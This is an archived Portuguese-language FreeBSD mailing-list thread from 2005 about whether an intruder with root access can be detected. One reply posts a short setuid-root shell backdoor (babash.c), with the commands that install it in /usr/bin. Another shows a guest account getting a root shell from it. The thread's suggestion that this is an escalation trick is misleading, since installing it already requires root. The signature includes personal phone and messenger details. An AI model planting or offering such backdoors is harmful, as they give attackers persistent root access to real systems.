RES: [FUG-BR] segurança
Wagner R. Serrano
wagner_serrano em terra.com.br
Sáb Abr 9 16:10:38 BRT 2005
Testei no FreeBSD 5.3, vejam o resultado:
Usuário guest faz o logon e depois que o programa roda ele vira root
$ id
uid=2001(guest) gid=2000(users) groups=2000(users)
$ ./babash
bash-2.05b# id
uid=0(root) gid=2000(users) groups=2000(users)
--
___________________________________________
WAGNER REZENDE SERRANO
Mobile: +55-11-8456-7828
Phone : +55-11-5051-5278
e-mail: wagner_serrano em terra.com.br
MSN/messenger: wagner_serrano em hotmail.com
ICQ 270-897-145
--
Augusto, Alexandre wrote:
> Oi pessoal,
>
> Tentem isso:
>
> vi babash.c
> #include <stdlib.h>
> main () {
> setuid(0);
> system("/bin/bash");
> }
>
> /usr/local/bin/gcc babash.c -o babash
> chmod 4755 babash
> mv babash /usr/bin/babash
>
> Não me lembro quem escreveu esse brinquedo. Não fui eu pois meu conhecimento
> em C é pobre...
>
> Tem rodado em maquinas solaris 8, 9 e Linux...
> Ainda não rodei no BSD ...
>
> Abraço
>
>
>
> -----Mensagem original-----
> De: Freebsd-bounces em fug.com.br [mailto:Freebsd-bounces em fug.com.br] Em nome
> de Celso Viana
> Enviada em: sexta-feira, 8 de abril de 2005 10:12
> Para: Lista de discussao do grupo FUG-BR
> Assunto: Re: [FUG-BR] segurança
>
> sim...... uso secure level 2
>
> o cenário seria esse: tendo acabado de instalar o OS, instalei um
> software que tem uma falha de segurança e eu não sei disso;
> essa máquina está visível para o mundo (ip real);
> essa máquina ainda não foi atualizada;
> o OS está em secure level 2;
>
> minha dúvida: imaginemos que alguém, nesse momento, descobriu essa
> máquina e resolva explorar essa vulnerabilidade e tenha ganhado acesso
> root; eu, estando logado no console, posso identificar esse invasor?
> ele está visível para os comandos do sistema? é possível fazer com que
> o sistema emita um alarme qdo esse invasor consiga o acesso?
>
> Celso
>
>
> Celso
>
> On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA
> <chris em irapida.com.br> wrote:
>
>>depende
>>
>>vc usa secure level kernel ????
>>
>>pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :)
>>
>>
>>Celso Viana wrote:
>>
>>
>>>all,
>>>
>>>Se alguém consegue explorar uma vulnerabilidade num sistema FreeBSD,
>>>ganhando acesso root, esse alguém fica totalmente invisível? ou os
>>>comandos "w, who, etc" identificam o invasor?
>>>
>>>Celso
>>>
>>>_______________________________________________
>>>Freebsd mailing list
>>>Freebsd em fug.com.br
>>>http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
>>>
>>>
>>
>>_______________________________________________
>>Freebsd mailing list
>>Freebsd em fug.com.br
>>http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
>>
>
>
> _______________________________________________
> Freebsd mailing list
> Freebsd em fug.com.br
> http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
>
> _______________________________________________
> Freebsd mailing list
> Freebsd em fug.com.br
> http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
>
>
_______________________________________________
Freebsd mailing list
Freebsd em fug.com.br
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
Mais detalhes sobre a lista de discussão freebsd